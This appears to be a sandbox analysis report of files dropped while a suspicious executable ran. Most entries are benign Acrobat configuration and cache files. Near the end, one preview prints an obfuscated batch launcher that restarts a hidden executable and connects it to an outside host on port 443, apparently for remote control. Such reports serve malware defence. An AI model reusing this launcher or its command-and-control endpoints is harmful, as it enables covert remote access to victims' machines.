                                                                          SHA-256:9CBF45DB7B66CF4588CB817B7EAD047309D3021361CE7B40B5E4094665D8814F
                                                                          SHA-512:83414B1339C47EB8D5FD83B0963199D274303E8A2CCB171B8B0C78E65ED253666FBF2E8A6B0970C5FF8BA1D2470BCF15D90B6C1B7735878B335E18A008A546B7
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.211720413823802
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfBD2G6UpnrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGR22cUkee9
                                                                          MD5:8434A6FA436F34D7128EF7072162CFAC
                                                                          SHA1:25C5427406A20BC90D7308611ED59D1BCCE954C6
                                                                          SHA-256:828E5D51148F1CAD6DCC1DF81D61B5419DF932F9F7AED8702C93329625538971
                                                                          SHA-512:2ADCCA721640FFA3FEFEF78CD82325158A58AB5F30FCE9A98E31414DC46D5ACD3DD80E7835AB38CA71DC4CE888D20FB06E36593539F10FA7DFDE3B7DA3E3F837
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):285
                                                                          Entropy (8bit):5.276557606528456
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfPmwrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGH56Ukee9
                                                                          MD5:417A2253F1EB22A35DF2AB29B9D002D3
                                                                          SHA1:35527630E91D18183D809A114D55ECFD6D5FEDF8
                                                                          SHA-256:414720E8047720CB07FF6FBF317E55ED74BFE35120E3DF7AFA7CDB1EB449D49E
                                                                          SHA-512:B6467051F98604BAB97FB7953EE351DADE74A362319690D8986063781CCD9D6B3798808A14CA7BABB7FDFC7CC5932BF17ED4F086A607375FB99476803CC7E339
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1123
                                                                          Entropy (8bit):5.680772863226193
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XRTJha7pLgE9cQx8LennAvzBvkn0RCmK8czOCCSGj:Yv6TJhChgy6SAFv5Ah8cv/c
                                                                          MD5:8163C2789C6A097225B1E6ED41901731
                                                                          SHA1:5508BB4315E538CE41C67ECEB8909044F0278817
                                                                          SHA-256:10EF68DC162F5B34504835FE89BF8E473A9785E0C0FB57323692C2C1A1867115
                                                                          SHA-512:F17ADD96839A11763C7D6134F8F1E4AA65CC34AA893691A1CA0198E8A4CDFA032BFD620D4C0DFA16E0DF29D87FBF679254D4A0DD3AA93E283A36AD2EC1E67987
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.219938230551994
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJf8dPeUkwRe9:YvXKXFvEAvR/ZwHAmOGU8Ukee9
                                                                          MD5:1B4D022814572837677BC242A66CC240
                                                                          SHA1:794E42924CD9473A339C5AB26C0194AFEB901E52
                                                                          SHA-256:03564B036EF59F3AF0E54B6AE86D382504B9D262ABE40CC60AFE35FBC2CFC5BC
                                                                          SHA-512:AE34DFCC93C45A230EDBD392AD14972FCB1A1A80046C44300F1CB45A7DCE2AD8750B6C7451C9B5C20F7DFAD737416173FA5A0B6C1B4591E6EC96C2D9F7E218B4
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.218932451814059
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfQ1rPeUkwRe9:YvXKXFvEAvR/ZwHAmOGY16Ukee9
                                                                          MD5:286B13FAE7BA60D45734247B1E6F4A00
                                                                          SHA1:3795458826251FD8FE6E9E799D267045ECCCFF5C
                                                                          SHA-256:739E45EF37482F27F3BB7F2CB5245F4CFB992DB34E33D20B0E4E9E3BDB5F4987
                                                                          SHA-512:5D33EC94B33636C5F4DA1FFD20C9E92BB87873421C7907ED021D5AEDB1A1713944A18E98870AB40288941A0FE5A2D5F4E877145144BDCC17A1A2596706B6B334
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.233569907562903
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfFldPeUkwRe9:YvXKXFvEAvR/ZwHAmOGz8Ukee9
                                                                          MD5:F97032355FAD5F1F0B771DFFF4DE7AEB
                                                                          SHA1:41D192A1A7EFB9D2A46AEF6CAA68CA7F46648924
                                                                          SHA-256:6EAF8FFAFB4F3DD9491AB389ED1F16386E8A885D805D7AB0C12D7D04A6B3ADB5
                                                                          SHA-512:AB931B2EC0D46EFE6AC0F6D814A5D5197E96B06A9DC87109037E4C3464FCC00B7D461F17A73630B2B2273F58C264938F00F202409592592B0BE6234EE666D167
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.248282937539186
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfzdPeUkwRe9:YvXKXFvEAvR/ZwHAmOGb8Ukee9
                                                                          MD5:C7F53074C3E281005E4B65CA00868EED
                                                                          SHA1:D434638A76823D57C2F99F3C001AF4DF6A379B9A
                                                                          SHA-256:DCE4FCB881218656E9CAFC3E331D8EDA2DB7B99D98D8EF068F58673CC9026E56
                                                                          SHA-512:2AD66200C09BA3011C1DF5E6E83A826087F39E36EC51C9F9539C1EDB71FFF10B26B924D9808646666A2A1D42928070B66F9309741A5293D0FBAA95C8FCC88322
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.227991293867672
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfYdPeUkwRe9:YvXKXFvEAvR/ZwHAmOGg8Ukee9
                                                                          MD5:CECE4FAC513497D3F85FCC304EAD6DAF
                                                                          SHA1:BECAC936B01B212E29B8FE790D2AAB8CC0CD94AB
                                                                          SHA-256:267DABC0CECA56C84F6F8BB61848E236F1226ABEF9378C60C349C3107BAE8D52
                                                                          SHA-512:AED1EF7B8A7FEE0B830F9F8BB3C149C45B43BACC9A8043717A0CFEABE0D4A7E238B6E603D88F29BCAB0F8CDE209286BD11FCF479C55F11977D68AE80E5F0E29C
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):284
                                                                          Entropy (8bit):5.213876850312692
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJf+dPeUkwRe9:YvXKXFvEAvR/ZwHAmOG28Ukee9
                                                                          MD5:0F370A8E4ACD5715BF60171360689EBD
                                                                          SHA1:A9E17145769BAD5BA50C81DDC602BE685064129C
                                                                          SHA-256:6C8E54516558D8C07E88148003FEB10B6CDAFE2D03D07FA25C2205BC1D519F52
                                                                          SHA-512:9E7A2C11CD35CA40B567AFF73A897735532E737BF2B1C44F18B762C092A494CCA7E07C109CCA3043EE12EFE5C467CEF131DF8BB90BA984D12B34CB4FAE019C12
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.212033296738322
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfbPtdPeUkwRe9:YvXKXFvEAvR/ZwHAmOGDV8Ukee9
                                                                          MD5:9F40A9AA284AA9FF88B1DA04569455C3
                                                                          SHA1:70D181EAFE7D2ED7EA793C493837D691054F7020
                                                                          SHA-256:72E5353ABACF1C8998A26BCD47CC0C1B34175385C943EC5DA44C0F52FAEE2D0B
                                                                          SHA-512:B065CBEF1529D26597D45650C80E9AD5CCCC917D6ACE076AF6352A6239CD8B780ECEAFAB9065379F37DC72CC806D7AF2AFBAB9D5FF1981DF2ADBAABDE7E1AB76
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):287
                                                                          Entropy (8bit):5.210654814705667
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJf21rPeUkwRe9:YvXKXFvEAvR/ZwHAmOG+16Ukee9
                                                                          MD5:32BDDB9CEB1D886075DD460A2FFF1CDE
                                                                          SHA1:CA82190510C8ED002BA206E0B41CB90BB60713E3
                                                                          SHA-256:1C088CD41FCDEC6898138441C82EF83B7DA01E40C3A8E8DC1CB0C13292F92771
                                                                          SHA-512:95DB28023E3B1A675EFB63249C78AB50901E0FF78240CE1A196D8228D3FBB81A17EB86A285354822FB186C6E04CD7C6183E6D81217482D76BB492DA1CBF87F59
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1090
                                                                          Entropy (8bit):5.658958462452422
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XRTJha7amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSGj:Yv6TJhgBgkDMUJUAh8cvMc
                                                                          MD5:976672152259268DFCD73EAF1D18CA0B
                                                                          SHA1:EE6B2E2DEE2F78009590D37E28906A6F154CB0C6
                                                                          SHA-256:CE9599772D492497217583A91AEE05362524FBBCC95AF5CA781C232C6A4F2F03
                                                                          SHA-512:5B67270014F553B889E2EA3E52846B47C95EBD3DF843CB6FCB41E6F177C31939FC30EBDB9CBA91B7851292DA52E23A81EDF602AF3318ABC25CF3B3A132D38B26
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.184385689065375
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJfshHHrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGUUUkee9
                                                                          MD5:E9770DF3DCF72388B2F477478FE43285
                                                                          SHA1:A7A82F1B8B54F6B5D085C936BC74A6DABE9AED02
                                                                          SHA-256:B731771D4E5E0FE90219B3F6E31F9E185FD434E3C7261455F2D8D8BF6A0517FE
                                                                          SHA-512:7F7053F6486426E7D85C8DE4E364C43F3D351E34DE0432AE017F18B965F17F4A66FE21AE572E29EE543B1CC9C1C29FB17FA6C93CCC7C759AC92F17B235D3513F
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):282
                                                                          Entropy (8bit):5.208254827292123
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXpvIuaIER2vB3/dVlPIHAR0YaxoAvJTqgFCrPeUkwRe9:YvXKXFvEAvR/ZwHAmOGTq16Ukee9
                                                                          MD5:A351ADEF8EBF8A928DDEA3DEBBB68E1C
                                                                          SHA1:F41D10CF2BD059CB468AB5779A3BAF46C5BC319E
                                                                          SHA-256:FF706AF1751906E1C462875A042BE4267E3BFE5097C4AE8F0C7E5C949085FE06
                                                                          SHA-512:4A660F0A7C920769BC00AA4077133B64F23FE740923E054C61465291DC39F1C88AFFB7CDBD3D2F7D8A65ACCCFCFBC5A9B173DED8E1EC3DB780A2FBC3A59FDE21
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"daf80ece-a1e4-4da0-871f-a04ed11e940c","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735133209818,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:e:e
                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                          Malicious:false
                                                                          Preview:....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):2814
                                                                          Entropy (8bit):5.140993373996544
                                                                          Encrypted:false
                                                                          SSDEEP:24:Ype3YvGaO4ay3vQ8vWBNnoPvJudTv3bXm3BYvwSYvoALvPjd7nvj0SRvfJqEvC2r:YYLBNcudHW3/dPy/Nc5GMeaJtaCh93j
                                                                          MD5:7A6925C670D7014E0DA0D4FF09BA721E
                                                                          SHA1:066DA5957A92F37378ABD7CBD87F951EFC124C75
                                                                          SHA-256:8BBF78D0556418B2FA1BB3792EFDD8F0A1A30F1CCDD99FEDEA88A15FBA300E07
                                                                          SHA-512:4A3B6270852E579E4985E836C8BB582EFFE19397D519EE99F633759C0C5946E6F42B2ABDF4781BC606C56ABCD801FBFE02144B33FCC60A78AD40D624F4A83614
                                                                          Malicious:false
                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"62d4a8e8de356c982906349932008ca2","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734957499000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"b6f71618fd6b36bc9bbe9bcfff6415d1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734957499000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"dbe56fb0a1f1eb7eed99c6ba14b65e5d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734957499000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"ead6c34d6bc36c39e9cd71edd2a8a85d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734957499000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"27231bb69b098da53cf19950ef2379fc","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734957499000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"c762b17fc5b2565ea352698aeb8956ce","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):1.318604986365352
                                                                          Encrypted:false
                                                                          SSDEEP:48:TGufl2GL7ms9WR1CPmPbPahLHwypilIJHW:lNVms9WfMwbPah0T
                                                                          MD5:694DD6D93CBCA89DBD51951B8E9FC6CB
                                                                          SHA1:96E2E7D01135C8F2901E41B3DC6CCD69E685FE79
                                                                          SHA-256:CA866FE2C7C5EC4BD3312446DCC0A25D592A0DFBD9A56F10407687FA68C2CC44
                                                                          SHA-512:90B9F79EC759A351E51E54644B455B44CE2A6A753150041FE25F6C591FF8582298B80BB9AA1AD5BF624EBED8BE71DFB23D70D3266F6BC3361128E343FC2A8682
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):1.7818086772187525
                                                                          Encrypted:false
                                                                          SSDEEP:48:7MjWR1CPmPbPahLH1ypilIUqFl2GL7msw:7qWfMwbPahRRKVmsw
                                                                          MD5:99154E478C696FBCEF433670652978F1
                                                                          SHA1:A1C352266F8A5F09F773AC6CCBF184BAA808E845
                                                                          SHA-256:FDBD3198C3852BEEC1FFBB808FF1A0C73832C261FDA7C40DAE2498AC34BCF173
                                                                          SHA-512:BF9D6FACCA9E8D485B6553CF32F75EF9755245E5C9CAB1AA5830097F9FA65E4C2D2ED56FD9DF5C32ECD12DCA5B9A20D53ADE379E4BAABF66556FF6CC2E5D6014
                                                                          Malicious:false
                                                                          Preview:.... .c......$.>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):66726
                                                                          Entropy (8bit):5.392739213842091
                                                                          Encrypted:false
                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEg5xSCfjoBTRhE7sNvzJMN0tJVuYyu:6a6TZ44ADE5xSCfcBTRmIJuK
                                                                          MD5:D5DA9D64D90658AC05ED43EA2F65073A
                                                                          SHA1:74DD8E562B5947012FB1AE8508F92D8F40AD87EC
                                                                          SHA-256:C5301378202B8390F30D2B3AC332B37BE9A6BC8B73F429372E79452FC6FCF2A1
                                                                          SHA-512:1202460654B636670E549DADD2E78BA8A87CA7899480544AE8D75F912136C987BDA3EE211A81A2317A793414D374603B54FAE48D9E9AFF23C0EA18844A3EC729
                                                                          Malicious:false
                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):503
                                                                          Entropy (8bit):5.353292454999417
                                                                          Encrypted:false
                                                                          SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
                                                                          MD5:41F0189B83E9D493B86D7182B3514F9D
                                                                          SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                                          SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                                          SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1001
                                                                          Entropy (8bit):5.502266483327757
                                                                          Encrypted:false
                                                                          SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                                          MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                                          SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                                          SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
